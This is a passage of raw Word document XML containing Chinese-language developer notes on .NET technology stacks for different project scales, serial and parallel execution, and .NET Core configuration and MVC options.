          <w:numId w:val="188"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>好了，访问</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://localhost看到欢迎页面就行" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http://localhost看到欢迎页面就行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">。       </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="串行化"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>串行化</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-----串行是指多个任务执行时，各个任务按照顺序执行，完成一个才能执行下一个。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>并行化-----多个任务可以同时执行。异步是并行化的前提条件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目录分级-----按照模块将不同的文件区分开，就能提高读取的效率</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>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.NET业务搭建技术栈</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.企业官网</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这类可推荐一些来源CMS，无需关心后台，设计好页面，只修改前端页面就行。</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:可采用access,SQLite或sqlserver,mysql都行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1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net需要储备</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:了解ado.net，dapper，泛型，反射等。了解数据库操作常用语句。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2.流量内容网站</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整个网站属于新闻类型，有较多内容分类，日均访问量一万以下。每小时平均一千量。相对于iis每秒成百上千处理数，这点量丝毫不成压力。能日均一万访问量，那说明这个站在小圈子内有很大名气了。</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仍然推荐开源或自研的cms，一般方案首页和分类定时静态化或启用缓存，明细页直读数据库或经过缓存。</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：sqlserver,mysql,mongodb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1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net储备：</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定时任务如hangfire,quartz.net，</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Cache系列(页面缓存，httpruntime缓存等)，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安装windows服务topshelf</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uv和pv等了解。</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pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.小流量业务管理系统</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powerbuilder开发，用的是db2数据库，每天营业额数据也挺大的。每天十点有日结，月底有月结。</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sqlserver,mysql，postgresql</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.net储备:</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 写分离也可以在这时介入。</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Redis可以考虑引入。</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在计算报表和一些情况下，多线程，并行处理数据也会考虑引入。</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Dapper,EF开始了用武之地，干起来！</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依赖注入，aop 可以考虑引入。</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可考虑引入前端vue,element。</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pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.互联网项目和大数据项目</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c端或B端。访问量大，业务多。虽然还有很多细分，但面向了互联网，我们就时刻准备着未来它能爆发式迎接大批量数据，我们的应用要高可用，健壮！时刻准备着，为未来！哪怕很多互联网公司生存周期只有几年！</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数据库：Mongodb，mysql,postgresql</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.net储备:</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Mongodb集群，分片等。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必不可少，Redis缓存，缓解数据库压力。需要了解redis运行机制，缓存穿透和缓存雪崩等。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必不可少，消息队列rabbitmq或Kafka，多业务系统之间消息传递，解藕。需要了解rabbitmq运行机制和amqp协议。</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 Elastic-search，Es可以通过mongo-connector实现同步mongodb数据，是一个数据极快的搜索引擎。另外可以用ELK搭建日志分析系统，这块我还需要练练手，需要了解Es如何应用，部署，问题排查等。</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：微服务api网关，监控，服务发现，熔断降级，限流等。可参考微软olreans,Akka.net,ocelot,appllo，前些天过千的surging。有源码的常分析借鉴，理解透。</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理论积累之TDD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>：单元测试，集成测试，自动化测试。</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理论积累之CI/CD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:需要熟练掌握jenkins配置。熟悉docker生态工具用法。</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CQRS责任分离，贫血富血模型。我现在正在抽时间看这个，期待能有所应用。</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理论积累之.net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>：</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网络编程socket，orleans的网关连接就是基于socket，在之上又包装了一层gateway连接。socket和tcp/ip通信息息相关，熟练了这个，其他语言同样思路都会了。很多RPC框架也是基于socket，是网络连接的源泉。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mvc的通用主机，内置kestrel，中间件等，单元测试，docker运行等需要深入了解。</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理论积累之Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</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.netcore最重要特性是跨平台，以前对linux不熟悉的部分，需要尽快熟练，要变成一个老手。</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业务演练之秒杀</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业务演练之实现消息队列模型</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pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>业务演练之搭建微服务框架模型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="23" w:lineRule="atLeast"/>
        <w:ind w:firstLine="147"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b/>
          <w:color w:val="A52A2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
        </w:rPr>
        <w:t>.NET Core</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在.NET FCL中我们创建的项目中常常会用到两种配置文件app.config和web.config。读取它们需要我们添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>System.Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的引用。它们都是XML格式文件。在不同环境中常常要替换配置文件，因为里面的内容是不同的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在.NET Core中对配置文件进行了大幅修改，不仅执行XML，JSON，环境变量，ini等格式，还支持热更新，可以通过一些技巧实现不同环境的配置。它们依赖与Nuget中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Microsoft.Extensions.Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>包。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以下是要支持配置文件对应的包</w:t>
      </w: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43"/>
        <w:gridCol w:w="5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43" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>配置项存放地</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5839" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>提供支持包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43" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>内存变量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5839" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Microsoft.Extensions.Configuration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43" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>环境变量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5839" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Microsoft.Extensions.Configuration.EnvironmentVariables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43" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>ni文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5839" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Microsoft.Extensions.Configuration.Ini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43" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Json文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5839" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Microsoft.Extensions.Configuration.Json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43" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Xml文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5839" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Microsoft.Extensions.Configuration.Xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在创建这些文件后，还需要把这些文件的属性设置为始终复制到输出目录中去。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>调用方法如下：</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IConfiguration configuration = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> ConfigurationBuilder().SetBasePath(Environment.CurrentDirectory)</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hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.AddInMemoryCollection(list)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> //读取内存变量</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">                                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.Build();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SetBasePath()用于设置读取配置文件的根路径。AddInMemoryCollection表示从内存中读取配置项。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MVC配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Config</w:t>
      </w:r>
      <w:r>
        <w:t>ureServices方法中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:t>调用AddMvc(options)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>options，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:t>有个配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>options.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>RespectBrowserAcceptHeader</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>它有如下作用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="38"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认情况下，后台会忽略浏览器传来的AcceptHeader并返回应用程序默认的格式(对于Api而言就是JSON)，这样一来，当使用不同的浏览器消费API时会获得一样的体验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而如果你希望你的应用程序有限考虑浏览器的Accept头，你就可以</w:t>
      </w:r>
      <w:r>
        <w:t>RespectBrowserAcceptHeader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
